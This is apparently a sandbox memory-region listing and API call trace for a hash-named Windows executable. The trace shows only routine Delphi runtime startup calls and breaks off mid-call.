pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1998 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1999 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2000 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2001 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2002 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2003 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2004 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2005 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2006 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2007 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2008 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2009 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2010 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2011 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2012 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2013 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2014 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2015 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2016 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2017 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2018 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2019 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2020 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2021 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2022 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2023 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2024 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2025 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2026 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2027 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2028 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2029 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2030 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2031 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2032 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2033 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2034 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2035 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2036 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2037 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2038 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2039 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2040 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2041 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2042 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2043 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2044 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2045 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2046 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2047 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2048 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2049 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2050 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2051 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2052 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2053 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2054 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2055 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2056 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2057 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2058 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2059 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2060 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2061 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2062 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2063 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2064 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2065 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2066 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2067 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2068 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2069 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2070 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2071 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 2072 start_va = 0x3de0000 end_va = 0x3e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 2073 start_va = 0x3de0000 end_va = 0x3e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 2074 start_va = 0x3e50000 end_va = 0x3e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 2075 start_va = 0x3e60000 end_va = 0x3f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 2076 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 2077 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e20000" filename = "" Region: id = 2078 start_va = 0x3e20000 end_va = 0x3e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e20000" filename = "" Region: id = 2079 start_va = 0x3f60000 end_va = 0x4451fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f60000" filename = "" Region: id = 2080 start_va = 0x4460000 end_va = 0x4951fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004460000" filename = "" Region: id = 2081 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 2082 start_va = 0x4460000 end_va = 0x4952fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 2083 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 2084 start_va = 0x3e40000 end_va = 0x3e48fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e40000" filename = "" Region: id = 2085 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 2086 start_va = 0x3e40000 end_va = 0x3e42fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e40000" filename = "" Region: id = 2087 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e30000" filename = "" Region: id = 2088 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 2334 start_va = 0x6c9e0000 end_va = 0x6cb52fff monitored = 0 entry_point = 0x6ca8d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 2335 start_va = 0x4960000 end_va = 0x4a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 2336 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 2337 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e30000" filename = "" Region: id = 2338 start_va = 0x3e30000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e30000" filename = "" Region: id = 2339 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 2340 start_va = 0x3e40000 end_va = 0x3e48fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e40000" filename = "" Region: id = 2341 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 2342 start_va = 0x3e40000 end_va = 0x3e42fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e40000" filename = "" Region: id = 2343 start_va = 0x3e30000 end_va = 0x3e30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e30000" filename = "" Region: id = 2344 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 2592 start_va = 0x3c90000 end_va = 0x3c93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2593 start_va = 0x3e30000 end_va = 0x3e74fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2594 start_va = 0x3de0000 end_va = 0x3de3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2595 start_va = 0x3e80000 end_va = 0x3f0dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 2596 start_va = 0x3df0000 end_va = 0x3df3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2597 start_va = 0x3e00000 end_va = 0x3e12fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 2598 start_va = 0x3f10000 end_va = 0x3f10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f10000" filename = "" Thread: id = 1 os_tid = 0xab0 [0073.366] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0073.368] GetKeyboardType (nTypeFlag=0) returned 4 [0073.632] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " [0073.632] GetStartupInfoA (in: lpStartupInfo=0x19fef4 | out: lpStartupInfo=0x19fef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0073.632] GetVersion () returned 0x23f00206 [0073.632] GetVersion () returned 0x23f00206 [0073.633] GetCurrentThreadId () returned 0xab0 [0073.633] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19f9f0, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x62 [0073.633] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19f8cb, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x62 [0073.633] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19f9e0 | out: phkResult=0x19f9e0*=0x0) returned 0x2 [0073.633] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19f9e0 | out: phkResult=0x19f9e0*=0x0) returned 0x2 [0073.633] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19f9e0 | out: phkResult=0x19f9e0*=0x0) returned 0x2 [0073.633] lstrcpynA (in: lpString1=0x19f8cb, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", iMaxLength=261 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0073.633] GetThreadLocale () returned 0x409 [0073.633] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x19f9db, cchData=5 | out: lpLCData="ENU") returned 4 [0073.634] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned 98 [0073.634] lstrcpynA (in: lpString1=0x19f92a, lpString2="ENU", iMaxLength=166 | out: lpString1="ENU") returned="ENU" [0073.634] LoadLibraryExA (lpLibFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0073.634] lstrcpynA (in: lpString1=0x19f92a, lpString2="EN", iMaxLength=166 | out: lpString1="EN") returned="EN" [0073.634] LoadLibraryExA (lpLibFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0073.635] LoadStringA (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0073.635] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6db480 [0073.635] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2280000 [0073.636] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6dc480 [0073.636] VirtualAlloc (lpAddress=0x2280000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2280000 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffea, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0073.636] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x19fb14, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x19fb00, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0073.637] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x19fb00, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0073.637] GetVersionExA (in: lpVersionInformation=0x19fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, 